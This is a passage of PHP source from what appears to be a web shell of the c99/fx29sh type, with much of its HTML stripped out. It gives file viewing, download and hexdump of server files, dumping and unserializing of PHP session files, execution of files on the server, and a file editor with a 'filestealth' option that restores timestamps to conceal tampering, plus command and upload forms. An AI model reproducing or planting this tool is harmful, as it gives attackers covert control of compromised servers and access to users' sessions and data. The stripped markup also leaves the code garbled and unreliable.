\n". "Create"); } } else { $r = @file_get_contents($d.$f); $ext = explode(".",$f); $c = count($ext)-1; $ext = $ext[$c]; $ext = strtolower($ext); $rft = ""; foreach ($ftypes as $k => $v) { if (in_array($ext,$v)) { $rft = $k; break; } } if (eregi("sess_(.*)",$f)) { $rft = "phpsess"; } if (empty($ft)) { $ft = $rft; } $arr = array( array("","info"), array("","html"), array("","txt"), array("","ini"), array("Code","code"), array("Session","phpsess"), array("SDB","sdb"), array("","exe"), array("","img"), array("","notepad"), array("","edit"), array("","download") ); echo "

.: File Viewer [".$f." (".view_size(filesize($d.$f)).") ".view_perms_color($d.$f).") :.\n"; echo "

---

\n"; foreach($arr as $t) { if ($t[1] == $rft) { echo "".$t[0].""; } elseif ($t[1] == $ft) { echo "".$t[0].""; } else { echo "".$t[0].""; } echo " (+) "; } echo "

\n"; if ($ft == "info") { echo "

Information

\n". "\n". "\n". "\n". "\n"; if (!is_windows()) { echo "\n". "\n". "\n". "\n"; echo "\n". "\n". "

Path	".$d.$f."
Size	".view_size(filesize($d.$f))."
MD5	".md5_file($d.$f)."
Owner/Group	"; $ow = posix_getpwuid(fileowner($d.$f)); $gr = posix_getgrgid(filegroup($d.$f)); echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f)); } echo "
Perms	".view_perms_color($d.$f)."
Create time	".date("d/m/Y H:i:s",filectime($d.$f))."
Access time	".date("d/m/Y H:i:s",fileatime($d.$f))."
Modify time	".date("d/m/Y H:i:s",filemtime($d.$f))."
HexDump	\n". "[ Full ] ". "[ Preview ] \n". "
Base64	\n". "[ Encode ] ". "[ +chunk ] ". "[ +chunk+quotes ] ". "[ Decode ] ". "

\n"; $fi = fopen($d.$f,"rb"); if ($fi) { echo "

"; if (@$fullhexdump) { echo "Full HexDump"; $str = fread($fi,filesize($d.$f)); } else { echo "HexDump Preview"; $str = fread($fi,$hexdump_lines*$hexdump_rows); } $n = 0; $a0 = "00000000
"; $a1 = ""; $a2 = ""; for ($i=0; $i";} $a1 .= "
"; $a2 .= "
"; } } echo "

\n"; echo "

".$a0."

".$a1."

".$a2."

\n"; } $henc = ""; $encoded = ""; if (!isset($base64)) { $base64 = ""; } if ($base64 == 1) { $henc = "Base64 Encode"; $encoded = base64_encode(file_get_contents($d.$f)); } elseif($base64 == 2) { $henc = "Base64 Encode + Chunk"; $encoded = chunk_split(base64_encode(file_get_contents($d.$f))); } elseif($base64 == 3) { $henc = "Base64 Encode + Chunk + Quotes"; $encoded = base64_encode(file_get_contents($d.$f)); $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2); } elseif($base64 == 4) { $text = file_get_contents($d.$f); $encoded = base64_decode($text); $henc = "Base64 Decode"; if (base64_encode($encoded) != $text) { $henc .= " (Failed!)"; } } if (!empty($encoded)) { echo "

$henc

\n"; echo "".htmlspecialchars($encoded).""; echo "
\n"; } } elseif ($ft == "html") { if ($newwin) { @ob_clean(); echo $r; fx29shexit(); } else { echo $r; } } elseif ($ft == "txt") { echo "".htmlspecialchars($r).""; } elseif ($ft == "ini") { echo "

"; var_dump(parse_ini_file($d.$f,TRUE)); echo "

"; } elseif ($ft == "phpsess") { echo "

";

        $v = explode("|",$r);

        echo $v[0]."
";

        var_dump(unserialize($v[1]));

        echo "

"; } elseif ($ft == "exe") { $ext = explode(".",$f); $c = count($ext)-1; $ext = $ext[$c]; $ext = strtolower($ext); $rft = ""; foreach ($exeftypes as $k => $v) { if (in_array($ext,$v)) { $rft = $k; break; } } $cmd = str_replace("%f%",$f,$rft); echo "Execute file:\n". "

\n". "\n". "
\n". " \n". " - Display in text-area\n". "

\n"; } elseif ($ft == "sdb") { echo "

"; var_dump(unserialize(base64_decode($r))); echo "

\n"; } elseif ($ft == "code") { echo "

\n"; if (@$newwin) { @ob_clean(); highlight_file($d.$f); fx29shexit(); } else { highlight_file($d.$f); } echo "\n

\n"; } elseif ($ft == "notepad") { @ob_clean(); header("Content-type: text/plain"); header("Content-disposition: attachment; filename=\"".$f.".txt\";"); echo($r); exit; } elseif ($ft == "download") { @ob_clean(); header("Content-type: application/octet-stream"); header("Content-length: ".filesize($d.$f)); header("Content-disposition: attachment; filename=\"".$f."\";"); echo $r; exit; } elseif ($ft == "img") { $inf = getimagesize($d.$f); if (!$newwin) { if (empty($imgsize)) {$imgsize = 20;} $width = $inf[0]/100*$imgsize; $height = $inf[1]/100*$imgsize; echo "Size: "; $sizes = array("100","50","20"); foreach ($sizes as $v) { echo ""; if ($imgsize != $v ) {echo $v;} else {echo "".$v."";} echo "   "; } echo "

"; } else { @ob_clean(); $ext = explode($f,"."); $ext = $ext[count($ext)-1]; header("Content-type: ".$inf["mime"]); readfile($d.$f); exit; } } elseif ($ft == "edit") { if (!empty($submit)) { if ($filestealth) {$stat = stat($d.$f);} $fp = fopen($d.$f,"w"); if (!$fp) {echo "Can't write to file!";} else { echo "Saved!"; fwrite($fp,$edit_text); fclose($fp); if ($filestealth) { touch($d.$f,$stat[9],$stat[8]); } $r = $edit_text; } } $rows = count(explode("\r\n",$r)); if ($rows < 10) { $rows = 10; } elseif ($rows > 30) { $rows = 30; } echo "

\n". " ". " ". "
". "".htmlspecialchars($r)."\n". "

\n"; } elseif (!empty($ft)) { echo "Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS."; } else { echo "Unknown file type (".$ext."), please select type manually."; } } echo "

Command:
Quick Commands:		'.htmlspecialchars($als[0]).''; echo "\n"; } ?>
PHP Filesystem:		".$als[0]."\n"; } else { echo "\t\t".$als[0]."\n"; } } ?>
		$o) { echo "\t\n"; } ?>
Filesystem	Search:	regexp
	Upload:
	Create:	Overwrite
	View: